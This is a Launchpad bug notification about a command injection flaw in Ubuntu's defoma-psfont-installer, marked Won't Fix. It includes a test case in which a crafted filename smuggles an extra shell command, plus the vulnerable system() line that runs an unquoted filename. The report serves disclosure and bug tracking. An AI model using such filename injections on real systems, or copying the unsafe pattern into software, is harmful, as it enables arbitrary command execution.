[Bug 782209] Re: command injection in defoma-psfont-installer
Adolfo Jayme
fitoschido at gmail.com
Mon Feb 3 23:43:02 UTC 2014
** Changed in: defoma (Ubuntu)
Status: New => Won't Fix
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to defoma in Ubuntu.
https://bugs.launchpad.net/bugs/782209
Title:
command injection in defoma-psfont-installer
Status in “defoma” package in Ubuntu:
Won't Fix
Bug description:
Binary package hint: psfontmgr
/usr/bin/defoma-psfont-installer have command injection bug .
test case :
emanuel at emanuel-desktop:/tmp$ touch "123" "123';echo Systeminj;echo '1" # select that file in next command
emanuel at emanuel-desktop:/tmp$ /usr/bin/defoma-psfont-installer
Systeminj
No font gets registered.
the bug can be found at :
system("/bin/cat '$ppdfile' | /usr/bin/tr '\\r' '\\n' > $tempfile");
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/defoma/+bug/782209/+subscriptions
More information about the foundations-bugs
mailing list